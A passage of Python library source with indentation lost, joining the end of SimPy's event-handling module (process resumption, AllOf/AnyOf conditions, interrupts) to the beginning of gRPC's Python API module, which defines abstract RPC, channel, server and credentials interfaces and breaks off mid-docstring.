the process generator exits, the process itself will get triggered with
the return value or the exception of the generator."""
# Mark the current process as active.
self.env._active_proc = self
while True:
# Get next event from process
try:
if event._ok:
event = self._generator.send(event._value)
else:
# The process has no choice but to handle the failed event
# (or fail itself).
event._defused = True
# Create an exclusive copy of the exception for this
# process to prevent traceback modifications by other
# processes.
exc = type(event._value)(*event._value.args)
exc.__cause__ = event._value
if PY2:
if hasattr(event._value, '__traceback__'):
exc.__traceback__ = event._value.__traceback__
event = self._generator.throw(exc)
except StopIteration as e:
# Process has terminated.
event = None
self._ok = True
self._value = e.args[0] if len(e.args) else None
self.env.schedule(self)
break
except BaseException as e:
# Process has failed.
event = None
self._ok = False
tb = e.__traceback__ if not PY2 else sys.exc_info()[2]
# Strip the frame of this function from the traceback as it
# does not add any useful information.
e.__traceback__ = tb.tb_next
self._value = e
self.env.schedule(self)
break
# Process returned another event to wait upon.
try:
# Be optimistic and blindly access the callbacks attribute.
if event.callbacks is not None:
# The event has not yet been triggered. Register callback
# to resume the process if that happens.
event.callbacks.append(self._resume)
break
except AttributeError:
# Our optimism didn't work out, figure out what went wrong and
# inform the user.
if not hasattr(event, 'callbacks'):
msg = 'Invalid yield value "%s"' % event
descr = _describe_frame(self._generator.gi_frame)
error = RuntimeError('\n%s%s' % (descr, msg))
# Drop the AttributeError as the cause for this exception.
error.__cause__ = None
raise error
self._target = event
self.env._active_proc = None
class ConditionValue(object):
"""Result of a :class:`~simpy.events.Condition`. It supports convenient
dict-like access to the triggered events and their values. The events are
ordered by their occurences in the condition."""
def __init__(self):
self.events = []
def __getitem__(self, key):
if key not in self.events:
raise KeyError(str(key))
return key._value
def __contains__(self, key):
return key in self.events
def __eq__(self, other):
if type(other) is ConditionValue:
return self.events == other.events
return self.todict() == other
def __repr__(self):
return '<ConditionValue %s>' % self.todict()
def __iter__(self):
return self.keys()
def keys(self):
return (event for event in self.events)
def values(self):
return (event._value for event in self.events)
def items(self):
return ((event, event._value) for event in self.events)
def todict(self):
return dict((event, event._value) for event in self.events)
class Condition(Event):
"""An event that gets triggered once the condition function *evaluate*
returns ``True`` on the given list of *events*.
The value of the condition event is an instance of :class:`ConditionValue`
which allows convenient access to the input events and their values. The
:class:`ConditionValue` will only contain entries for those events that
occurred before the condition is processed.
If one of the events fails, the condition also fails and forwards the
exception of the failing event.
The *evaluate* function receives the list of target events and the number
of processed events in this list: ``evaluate(events, processed_count)``. If
it returns ``True``, the condition is triggered. The
:func:`Condition.all_events()` and :func:`Condition.any_events()` functions
are used to implement *and* (``&``) and *or* (``|``) for events.
Condition events can be nested.
"""
def __init__(self, env, evaluate, events):
super(Condition, self).__init__(env)
self._evaluate = evaluate
self._events = events if type(events) is tuple else tuple(events)
self._count = 0
if not self._events:
# Immediately succeed if no events are provided.
self.succeed(ConditionValue())
return
# Check if events belong to the same environment.
for event in self._events:
if self.env != event.env:
raise ValueError('It is not allowed to mix events from '
'different environments')
# Check if the condition is met for each processed event. Attach
# _check() as a callback otherwise.
for event in self._events:
if event.callbacks is None:
self._check(event)
else:
event.callbacks.append(self._check)
# Register a callback which will build the value of this condition
# after it has been triggered.
self.callbacks.append(self._build_value)
def _desc(self):
"""Return a string *Condition(evaluate, [events])*."""
return '%s(%s, %s)' % (self.__class__.__name__,
self._evaluate.__name__, self._events)
def _populate_value(self, value):
"""Populate the *value* by recursively visiting all nested
conditions."""
for event in self._events:
if isinstance(event, Condition):
event._populate_value(value)
elif event.callbacks is None:
value.events.append(event)
def _build_value(self, event):
"""Build the value of this condition."""
self._remove_check_callbacks()
if event._ok:
self._value = ConditionValue()
self._populate_value(self._value)
def _remove_check_callbacks(self):
"""Remove _check() callbacks from events recursively.
Once the condition has triggered, the condition's events no longer need
to have _check() callbacks. Removing the _check() callbacks is
important to break circular references between the condition and
untriggered events.
"""
for event in self._events:
if event.callbacks and self._check in event.callbacks:
event.callbacks.remove(self._check)
if isinstance(event, Condition):
event._remove_check_callbacks()
def _check(self, event):
"""Check if the condition was already met and schedule the *event* if
so."""
if self._value is not PENDING:
return
self._count += 1
if not event._ok:
# Abort if the event has failed.
event._defused = True
self.fail(event._value)
elif self._evaluate(self._events, self._count):
# The condition has been met. The _build_value() callback will
# populate the ConditionValue once this condition is processed.
self.succeed()
@staticmethod
def all_events(events, count):
"""An evaluation function that returns ``True`` if all *events* have
been triggered."""
return len(events) == count
@staticmethod
def any_events(events, count):
"""An evaluation function that returns ``True`` if at least one of
*events* has been triggered."""
return count > 0 or len(events) == 0
class AllOf(Condition):
"""A :class:`~simpy.events.Condition` event that is triggered if all of
a list of *events* have been successfully triggered. Fails immediately if
any of *events* failed.
"""
def __init__(self, env, events):
super(AllOf, self).__init__(env, Condition.all_events, events)
class AnyOf(Condition):
"""A :class:`~simpy.events.Condition` event that is triggered if any of
a list of *events* has been successfully triggered. Fails immediately if
any of *events* failed.
"""
def __init__(self, env, events):
super(AnyOf, self).__init__(env, Condition.any_events, events)
class Interrupt(Exception):
"""Exception thrown into a process if it is interrupted (see
:func:`~simpy.events.Process.interrupt()`).
:attr:`cause` provides the reason for the interrupt, if any.
If a process is interrupted concurrently, all interrupts will be thrown
into the process in the same order as they occurred.
"""
def __str__(self):
return '%s(%r)' % (self.__class__.__name__, self.cause)
@property
def cause(self):
"""The cause of the interrupt or ``None`` if no cause was provided."""
return self.args[0]
def _describe_frame(frame):
"""Print filename, line number and function name of a stack frame."""
filename, name = frame.f_code.co_filename, frame.f_code.co_name
lineno = frame.f_lineno
with open(filename) as f:
for no, line in enumerate(f):
if no + 1 == lineno:
break
return ' File "%s", line %d, in %s\n %s\n' % (filename, lineno, name,
line.strip())
| |
# Copyright 2015-2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""gRPC's Python API."""
import abc
import enum
import six
from grpc._cython import cygrpc as _cygrpc
############################## Future Interface ###############################
class FutureTimeoutError(Exception):
"""Indicates that a method call on a Future timed out."""
class FutureCancelledError(Exception):
"""Indicates that the computation underlying a Future was cancelled."""
class Future(six.with_metaclass(abc.ABCMeta)):
"""A representation of a computation in another control flow.
Computations represented by a Future may be yet to be begun, may be ongoing,
or may have already completed.
"""
@abc.abstractmethod
def cancel(self):
"""Attempts to cancel the computation.
This method does not block.
Returns:
True if the computation has not yet begun, will not be allowed to take
place, and determination of both was possible without blocking. False
under all other circumstances including but not limited to the
computation's already having begun, the computation's already having
finished, and the computation's having been scheduled for execution on a
remote system for which a determination of whether or not it commenced
before being cancelled cannot be made without blocking.
"""
raise NotImplementedError()
@abc.abstractmethod
def cancelled(self):
"""Describes whether the computation was cancelled.
This method does not block.
Returns:
True if the computation was cancelled any time before its result became
immediately available. False under all other circumstances including but
not limited to this object's cancel method not having been called and
the computation's result having become immediately available.
"""
raise NotImplementedError()
@abc.abstractmethod
def running(self):
"""Describes whether the computation is taking place.
This method does not block.
Returns:
True if the computation is scheduled to take place in the future or is
taking place now, or False if the computation took place in the past or
was cancelled.
"""
raise NotImplementedError()
@abc.abstractmethod
def done(self):
"""Describes whether the computation has taken place.
This method does not block.
Returns:
True if the computation is known to have either completed or have been
unscheduled or interrupted. False if the computation may possibly be
executing or scheduled to execute later.
"""
raise NotImplementedError()
@abc.abstractmethod
def result(self, timeout=None):
"""Accesses the outcome of the computation or raises its exception.
This method may return immediately or may block.
Args:
timeout: The length of time in seconds to wait for the computation to
finish or be cancelled, or None if this method should block until the
computation has finished or is cancelled no matter how long that takes.
Returns:
The return value of the computation.
Raises:
FutureTimeoutError: If a timeout value is passed and the computation does
not terminate within the allotted time.
FutureCancelledError: If the computation was cancelled.
Exception: If the computation raised an exception, this call will raise
the same exception.
"""
raise NotImplementedError()
@abc.abstractmethod
def exception(self, timeout=None):
"""Return the exception raised by the computation.
This method may return immediately or may block.
Args:
timeout: The length of time in seconds to wait for the computation to
terminate or be cancelled, or None if this method should block until
the computation is terminated or is cancelled no matter how long that
takes.
Returns:
The exception raised by the computation, or None if the computation did
not raise an exception.
Raises:
FutureTimeoutError: If a timeout value is passed and the computation does
not terminate within the allotted time.
FutureCancelledError: If the computation was cancelled.
"""
raise NotImplementedError()
@abc.abstractmethod
def traceback(self, timeout=None):
"""Access the traceback of the exception raised by the computation.
This method may return immediately or may block.
Args:
timeout: The length of time in seconds to wait for the computation to
terminate or be cancelled, or None if this method should block until
the computation is terminated or is cancelled no matter how long that
takes.
Returns:
The traceback of the exception raised by the computation, or None if the
computation did not raise an exception.
Raises:
FutureTimeoutError: If a timeout value is passed and the computation does
not terminate within the allotted time.
FutureCancelledError: If the computation was cancelled.
"""
raise NotImplementedError()
@abc.abstractmethod
def add_done_callback(self, fn):
"""Adds a function to be called at completion of the computation.
The callback will be passed this Future object describing the outcome of
the computation.
If the computation has already completed, the callback will be called
immediately.
Args:
fn: A callable taking this Future object as its single parameter.
"""
raise NotImplementedError()
################################ gRPC Enums ##################################
@enum.unique
class ChannelConnectivity(enum.Enum):
"""Mirrors grpc_connectivity_state in the gRPC Core.
Attributes:
IDLE: The channel is idle.
CONNECTING: The channel is connecting.
READY: The channel is ready to conduct RPCs.
TRANSIENT_FAILURE: The channel has seen a failure from which it expects to
recover.
SHUTDOWN: The channel has seen a failure from which it cannot recover.
"""
IDLE = (_cygrpc.ConnectivityState.idle, 'idle')
CONNECTING = (_cygrpc.ConnectivityState.connecting, 'connecting')
READY = (_cygrpc.ConnectivityState.ready, 'ready')
TRANSIENT_FAILURE = (
_cygrpc.ConnectivityState.transient_failure, 'transient failure')
SHUTDOWN = (_cygrpc.ConnectivityState.shutdown, 'shutdown')
@enum.unique
class StatusCode(enum.Enum):
"""Mirrors grpc_status_code in the gRPC Core."""
OK = (_cygrpc.StatusCode.ok, 'ok')
CANCELLED = (_cygrpc.StatusCode.cancelled, 'cancelled')
UNKNOWN = (_cygrpc.StatusCode.unknown, 'unknown')
INVALID_ARGUMENT = (
_cygrpc.StatusCode.invalid_argument, 'invalid argument')
DEADLINE_EXCEEDED = (
_cygrpc.StatusCode.deadline_exceeded, 'deadline exceeded')
NOT_FOUND = (_cygrpc.StatusCode.not_found, 'not found')
ALREADY_EXISTS = (_cygrpc.StatusCode.already_exists, 'already exists')
PERMISSION_DENIED = (
_cygrpc.StatusCode.permission_denied, 'permission denied')
RESOURCE_EXHAUSTED = (
_cygrpc.StatusCode.resource_exhausted, 'resource exhausted')
FAILED_PRECONDITION = (
_cygrpc.StatusCode.failed_precondition, 'failed precondition')
ABORTED = (_cygrpc.StatusCode.aborted, 'aborted')
OUT_OF_RANGE = (_cygrpc.StatusCode.out_of_range, 'out of range')
UNIMPLEMENTED = (_cygrpc.StatusCode.unimplemented, 'unimplemented')
INTERNAL = (_cygrpc.StatusCode.internal, 'internal')
UNAVAILABLE = (_cygrpc.StatusCode.unavailable, 'unavailable')
DATA_LOSS = (_cygrpc.StatusCode.data_loss, 'data loss')
UNAUTHENTICATED = (_cygrpc.StatusCode.unauthenticated, 'unauthenticated')
############################# gRPC Exceptions ################################
class RpcError(Exception):
"""Raised by the gRPC library to indicate non-OK-status RPC termination."""
############################## Shared Context ################################
class RpcContext(six.with_metaclass(abc.ABCMeta)):
"""Provides RPC-related information and action."""
@abc.abstractmethod
def is_active(self):
"""Describes whether the RPC is active or has terminated."""
raise NotImplementedError()
@abc.abstractmethod
def time_remaining(self):
"""Describes the length of allowed time remaining for the RPC.
Returns:
A nonnegative float indicating the length of allowed time in seconds
remaining for the RPC to complete before it is considered to have timed
out, or None if no deadline was specified for the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def cancel(self):
"""Cancels the RPC.
Idempotent and has no effect if the RPC has already terminated.
"""
raise NotImplementedError()
@abc.abstractmethod
def add_callback(self, callback):
"""Registers a callback to be called on RPC termination.
Args:
callback: A no-parameter callable to be called on RPC termination.
Returns:
True if the callback was added and will be called later; False if the
callback was not added and will not later be called (because the RPC
already terminated or some other reason).
"""
raise NotImplementedError()
######################### Invocation-Side Context ############################
class Call(six.with_metaclass(abc.ABCMeta, RpcContext)):
"""Invocation-side utility object for an RPC."""
@abc.abstractmethod
def initial_metadata(self):
"""Accesses the initial metadata from the service-side of the RPC.
This method blocks until the value is available.
Returns:
The initial :term:`metadata`.
"""
raise NotImplementedError()
@abc.abstractmethod
def trailing_metadata(self):
"""Accesses the trailing metadata from the service-side of the RPC.
This method blocks until the value is available.
Returns:
The trailing :term:`metadata`.
"""
raise NotImplementedError()
@abc.abstractmethod
def code(self):
"""Accesses the status code emitted by the service-side of the RPC.
This method blocks until the value is available.
Returns:
The StatusCode value for the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def details(self):
"""Accesses the details value emitted by the service-side of the RPC.
This method blocks until the value is available.
Returns:
The details string of the RPC.
"""
raise NotImplementedError()
############ Authentication & Authorization Interfaces & Classes #############
class ChannelCredentials(object):
"""A value encapsulating the data required to create a secure Channel.
This class has no supported interface - it exists to define the type of its
instances and its instances exist to be passed to other functions.
"""
def __init__(self, credentials):
self._credentials = credentials
class CallCredentials(object):
"""A value encapsulating data asserting an identity over a channel.
A CallCredentials may be composed with ChannelCredentials to always assert
identity for every call over that Channel.
This class has no supported interface - it exists to define the type of its
instances and its instances exist to be passed to other functions.
"""
def __init__(self, credentials):
self._credentials = credentials
class AuthMetadataContext(six.with_metaclass(abc.ABCMeta)):
"""Provides information to call credentials metadata plugins.
Attributes:
service_url: A string URL of the service being called into.
method_name: A string of the fully qualified method name being called.
"""
class AuthMetadataPluginCallback(six.with_metaclass(abc.ABCMeta)):
"""Callback object received by a metadata plugin."""
def __call__(self, metadata, error):
"""Inform the gRPC runtime of the metadata to construct a CallCredentials.
Args:
metadata: The :term:`metadata` used to construct the CallCredentials.
error: An Exception to indicate error or None to indicate success.
"""
raise NotImplementedError()
class AuthMetadataPlugin(six.with_metaclass(abc.ABCMeta)):
"""A specification for custom authentication."""
def __call__(self, context, callback):
"""Implements authentication by passing metadata to a callback.
Implementations of this method must not block.
Args:
context: An AuthMetadataContext providing information on the RPC that the
plugin is being called to authenticate.
callback: An AuthMetadataPluginCallback to be invoked either synchronously
or asynchronously.
"""
raise NotImplementedError()
class ServerCredentials(object):
"""A value encapsulating the data required to open a secure port on a Server.
This class has no supported interface - it exists to define the type of its
instances and its instances exist to be passed to other functions.
"""
def __init__(self, credentials):
self._credentials = credentials
######################## Multi-Callable Interfaces ###########################
class UnaryUnaryMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a unary-unary RPC."""
@abc.abstractmethod
def __call__(self, request, timeout=None, metadata=None, credentials=None):
"""Synchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
The response value for the RPC.
Raises:
RpcError: Indicating that the RPC terminated with non-OK status. The
raised RpcError will also be a Call for the RPC affording the RPC's
metadata, status code, and details.
"""
raise NotImplementedError()
@abc.abstractmethod
def with_call(self, request, timeout=None, metadata=None, credentials=None):
"""Synchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: An optional durating of time in seconds to allow for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
The response value for the RPC and a Call value for the RPC.
Raises:
RpcError: Indicating that the RPC terminated with non-OK status. The
raised RpcError will also be a Call for the RPC affording the RPC's
metadata, status code, and details.
"""
raise NotImplementedError()
@abc.abstractmethod
def future(self, request, timeout=None, metadata=None, credentials=None):
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
An object that is both a Call for the RPC and a Future. In the event of
RPC completion, the return Future's result value will be the response
message of the RPC. Should the event terminate with non-OK status, the
returned Future's exception value will be an RpcError.
"""
raise NotImplementedError()
class UnaryStreamMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a unary-stream RPC."""
@abc.abstractmethod
def __call__(self, request, timeout=None, metadata=None, credentials=None):
"""Invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: An optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
An object that is both a Call for the RPC and an iterator of response
values. Drawing response values from the returned iterator may raise
RpcError indicating termination of the RPC with non-OK status.
"""
raise NotImplementedError()
class StreamUnaryMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a stream-unary RPC in any call style."""
@abc.abstractmethod
def __call__(
self, request_iterator, timeout=None, metadata=None, credentials=None):
"""Synchronously invokes the underlying RPC.
Args:
request_iterator: An iterator that yields request values for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
The response value for the RPC, and a Call for the RPC if with_call was
set to True at invocation.
Raises:
RpcError: Indicating that the RPC terminated with non-OK status. The
raised RpcError will also be a Call for the RPC affording the RPC's
metadata, status code, and details.
"""
raise NotImplementedError()
@abc.abstractmethod
def with_call(
self, request_iterator, timeout=None, metadata=None, credentials=None):
"""Synchronously invokes the underlying RPC.
Args:
request_iterator: An iterator that yields request values for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
The response value for the RPC and a Call for the RPC.
Raises:
RpcError: Indicating that the RPC terminated with non-OK status. The
raised RpcError will also be a Call for the RPC affording the RPC's
metadata, status code, and details.
"""
raise NotImplementedError()
@abc.abstractmethod
def future(
self, request_iterator, timeout=None, metadata=None, credentials=None):
"""Asynchronously invokes the underlying RPC.
Args:
request_iterator: An iterator that yields request values for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
An object that is both a Call for the RPC and a Future. In the event of
RPC completion, the return Future's result value will be the response
message of the RPC. Should the event terminate with non-OK status, the
returned Future's exception value will be an RpcError.
"""
raise NotImplementedError()
class StreamStreamMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a stream-stream RPC in any call style."""
@abc.abstractmethod
def __call__(
self, request_iterator, timeout=None, metadata=None, credentials=None):
"""Invokes the underlying RPC.
Args:
request_iterator: An iterator that yields request values for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
An object that is both a Call for the RPC and an iterator of response
values. Drawing response values from the returned iterator may raise
RpcError indicating termination of the RPC with non-OK status.
"""
raise NotImplementedError()
############################# Channel Interface ##############################
class Channel(six.with_metaclass(abc.ABCMeta)):
"""Affords RPC invocation via generic methods."""
@abc.abstractmethod
def subscribe(self, callback, try_to_connect=False):
"""Subscribes to this Channel's connectivity.
Args:
callback: A callable to be invoked and passed a ChannelConnectivity value
describing this Channel's connectivity. The callable will be invoked
immediately upon subscription and again for every change to this
Channel's connectivity thereafter until it is unsubscribed or this
Channel object goes out of scope.
try_to_connect: A boolean indicating whether or not this Channel should
attempt to connect if it is not already connected and ready to conduct
RPCs.
"""
raise NotImplementedError()
@abc.abstractmethod
def unsubscribe(self, callback):
"""Unsubscribes a callback from this Channel's connectivity.
Args:
callback: A callable previously registered with this Channel from having
been passed to its "subscribe" method.
"""
raise NotImplementedError()
@abc.abstractmethod
def unary_unary(
self, method, request_serializer=None, response_deserializer=None):
"""Creates a UnaryUnaryMultiCallable for a unary-unary method.
Args:
method: The name of the RPC method.
Returns:
A UnaryUnaryMultiCallable value for the named unary-unary method.
"""
raise NotImplementedError()
@abc.abstractmethod
def unary_stream(
self, method, request_serializer=None, response_deserializer=None):
"""Creates a UnaryStreamMultiCallable for a unary-stream method.
Args:
method: The name of the RPC method.
Returns:
A UnaryStreamMultiCallable value for the name unary-stream method.
"""
raise NotImplementedError()
@abc.abstractmethod
def stream_unary(
self, method, request_serializer=None, response_deserializer=None):
"""Creates a StreamUnaryMultiCallable for a stream-unary method.
Args:
method: The name of the RPC method.
Returns:
A StreamUnaryMultiCallable value for the named stream-unary method.
"""
raise NotImplementedError()
@abc.abstractmethod
def stream_stream(
self, method, request_serializer=None, response_deserializer=None):
"""Creates a StreamStreamMultiCallable for a stream-stream method.
Args:
method: The name of the RPC method.
Returns:
A StreamStreamMultiCallable value for the named stream-stream method.
"""
raise NotImplementedError()
########################## Service-Side Context ##############################
class ServicerContext(six.with_metaclass(abc.ABCMeta, RpcContext)):
"""A context object passed to method implementations."""
@abc.abstractmethod
def invocation_metadata(self):
"""Accesses the metadata from the invocation-side of the RPC.
Returns:
The invocation :term:`metadata`.
"""
raise NotImplementedError()
@abc.abstractmethod
def peer(self):
"""Identifies the peer that invoked the RPC being serviced.
Returns:
A string identifying the peer that invoked the RPC being serviced.
"""
raise NotImplementedError()
@abc.abstractmethod
def send_initial_metadata(self, initial_metadata):
"""Sends the initial metadata value to the invocation-side of the RPC.
This method need not be called by method implementations if they have no
service-side initial metadata to transmit.
Args:
initial_metadata: The initial :term:`metadata`.
"""
raise NotImplementedError()
@abc.abstractmethod
def set_trailing_metadata(self, trailing_metadata):
"""Accepts the trailing metadata value of the RPC.
This method need not be called by method implementations if they have no
service-side trailing metadata to transmit.
Args:
trailing_metadata: The trailing :term:`metadata`.
"""
raise NotImplementedError()
@abc.abstractmethod
def set_code(self, code):
"""Accepts the status code of the RPC.
This method need not be called by method implementations if they wish the
gRPC runtime to determine the status code of the RPC.
Args:
code: The integer status code of the RPC to be transmitted to the
invocation side of the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def set_details(self, details):
"""Accepts the service-side details of the RPC.
This method need not be called by method implementations if they have no
details to transmit.
Args:
details: The details string of the RPC to be transmitted to
the invocation side of the RPC.
"""
raise NotImplementedError()
##################### Service-Side Handler Interfaces ########################
class RpcMethodHandler(six.with_metaclass(abc.ABCMeta)):
"""An implementation of a single RPC method.
Attributes:
request_streaming: Whether the RPC supports exactly one request message or
any arbitrary number of request messages.
response_streaming: Whether the RPC supports exactly one response message or
any arbitrary number of response messages.
request_deserializer: A callable behavior that accepts a byte string and
returns an object suitable to be passed to this object's business logic,
or None to indicate that this object's business logic should be passed the
raw request bytes.
response_serializer: A callable behavior that accepts an object produced by
this object's business logic and returns a byte string, or None to
indicate that the byte strings produced by this object's business logic
should be transmitted on the wire as they are.
unary_unary: This object's application-specific business logic as a callable
value that takes a request value and a ServicerContext object and returns
a response value. Only non-None if both request_streaming and
response_streaming are False.
unary_stream: This object's application-specific business logic as a
callable value that takes a request value and a ServicerContext object and
returns an iterator of response values. Only non-None if request_streaming
is False and response_streaming is True.
stream_unary: This object's application-specific business logic as a
callable value that takes an iterator of request values and a
ServicerContext object and returns a response value. Only non-None if
request_streaming is True and response_streaming is False.
stream_stream: This object's application-specific business logic as a
callable value that takes an iterator of request values and a
ServicerContext object and returns an iterator of response values. Only
non-None if request_streaming and response_streaming are both True.
"""
class HandlerCallDetails(six.with_metaclass(abc.ABCMeta)):
"""Describes an RPC that has just arrived for service.
Attributes:
method: The method name of the RPC.
invocation_metadata: The :term:`metadata` from the invocation side of the RPC.
"""
class GenericRpcHandler(six.with_metaclass(abc.ABCMeta)):
"""An implementation of arbitrarily many RPC methods."""
@abc.abstractmethod
def service(self, handler_call_details):
"""Services an RPC (or not).
Args:
handler_call_details: A HandlerCallDetails describing the RPC.
Returns:
An RpcMethodHandler with which the RPC may be serviced, or None to
indicate that this object will not be servicing the RPC.
"""
raise NotImplementedError()
############################# Server Interface ###############################
class Server(six.with_metaclass(abc.ABCMeta)):
"""Services RPCs."""
@abc.abstractmethod
def add_generic_rpc_handlers(self, generic_rpc_handlers):
"""Registers GenericRpcHandlers with this Server.
This method is only safe to call before the server is started.
Args:
generic_rpc_handlers: An iterable of GenericRpcHandlers that will be used
to service RPCs after this Server is started.
"""
raise NotImplementedError()
@abc.abstractmethod
def add_insecure_port(self, address):
"""Reserves a port for insecure RPC service once this Server becomes active.
This method may only be called before calling this Server's start method is
called.
Args:
address: The address for which to open a port.
Returns:
An integer port on which RPCs will be serviced after this link has been
started. This is typically the same number as the port number contained
in the passed address, but will likely be different if the port number
contained in the passed address was zero.
"""
raise NotImplementedError()
@abc.abstractmethod
def add_secure_port(self, address, server_credentials):
"""Reserves a port for secure RPC service after this Server becomes active.
This method may only be called before calling this Server's start method is
called.
Args:
address: The address for which to open a port.
server_credentials: A ServerCredentials.
Returns:
An integer port on which RPCs will be serviced after this link has been
started. This is typically the same number as the port number contained
in the passed address, but will likely be different if the port number
contained in the passed address was zero.
"""
raise NotImplementedError()
@abc.abstractmethod
def start(self):
"""Starts this Server's service of RPCs.
This method may only be called while the server is not serving RPCs (i.e. it
is not idempotent).
"""
raise NotImplementedError()
@abc.abstractmethod
def stop(self, grace):
"""Stops this Server's service of RPCs.
All calls to this method immediately stop service of new RPCs. When existing
RPCs are aborted is controlled by the grace period parameter passed to this
method.
This method may be called at any time and is idempotent. Passing a smaller
grace value than has been passed in a previous call will have the effect of
stopping the Server sooner. Passing a larger grace value than has been
passed in a previous call will not have the effect of stopping the server
later.
Args:
grace: A duration of time in seconds to allow existing RPCs to complete
before being aborted by this Server's stopping. If None, this method
will block until the server is completely stopped.
Returns:
A threading.Event that will be set when this Server has completely
stopped. The returned event may not be set until after the full grace
period (if some ongoing RPC continues for the full length of the period)
of it may be set much sooner (such as if this Server had no RPCs underway
at the time it was stopped or if all RPCs that it had underway completed
very early in the grace period).
"""
raise NotImplementedError()
################################# Functions ################################
def unary_unary_rpc_method_handler(
behavior, request_deserializer=None, response_serializer=None):
"""Creates an RpcMethodHandler for a unary-unary RPC method.
Args:
behavior: The implementation of an RPC method as a callable behavior taking
a single request value and returning a single response value.
request_deserializer: An optional request deserialization behavior.
response_serializer: An optional response serialization behavior.
Returns:
An RpcMethodHandler for a unary-unary RPC method constructed from the given
parameters.
"""
from grpc import _utilities
return _utilities.RpcMethodHandler(
False, False, request_deserializer, response_serializer, behavior, None,
None, None)
def unary_stream_rpc_method_handler(
behavior, request_deserializer=None, response_serializer=None):
"""Creates an RpcMethodHandler for a unary-stream RPC method.
Args:
behavior: The implementation of an RPC method as a callable behavior taking
a single request value and returning an iterator of response values.
request_deserializer: An optional request deserialization behavior.
response_serializer: An optional response serialization behavior.
Returns:
An RpcMethodHandler for a unary-stream RPC method constructed from the
given parameters.
"""
from grpc import _utilities
return _utilities.RpcMethodHandler(
False, True, request_deserializer, response_serializer, None, behavior,
None, None)
def stream_unary_rpc_method_handler(
behavior, request_deserializer=None, response_serializer=None):
"""Creates an RpcMethodHandler for a stream-unary RPC method.
Args:
behavior: The implementation of an RPC method as a callable behavior taking
an iterator of request values and returning a single response value.
request_deserializer: An optional request deserialization behavior.
response_serializer: An optional response serialization behavior.
Returns:
An RpcMethodHandler for a stream-unary RPC method constructed from the
given parameters.
"""
from grpc import _utilities
return _utilities.RpcMethodHandler(
True, False, request_deserializer, response_serializer, None, None,
behavior, None)
def stream_stream_rpc_method_handler(
behavior, request_deserializer=None, response_serializer=None):
"""Creates an RpcMethodHandler for a stream-stream RPC method.
Args:
behavior: The implementation of an RPC method as a callable behavior taking
an iterator of request values and returning an iterator of response
values.
request_deserializer: An optional request deserialization behavior.
response_serializer: An optional response serialization behavior.
Returns:
An RpcMethodHandler for a stream-stream RPC method constructed from the
given parameters.
"""
from grpc import _utilities
return _utilities.RpcMethodHandler(
True, True, request_deserializer, response_serializer, None, None, None,
behavior)
def method_handlers_generic_handler(service, method_handlers):
"""Creates a grpc.GenericRpcHandler from RpcMethodHandlers.
Args:
service: A service name to be used for the given method handlers.
method_handlers: A dictionary from method name to RpcMethodHandler
implementing the named method.
Returns:
A GenericRpcHandler constructed from the given parameters.
"""
from grpc import _utilities
return _utilities.DictionaryGenericHandler(service, method_handlers)
def ssl_channel_credentials(
root_certificates=None, private_key=None, certificate_chain=None):
"""Creates a ChannelCredentials for use with an SSL-enabled Channel.
Args:
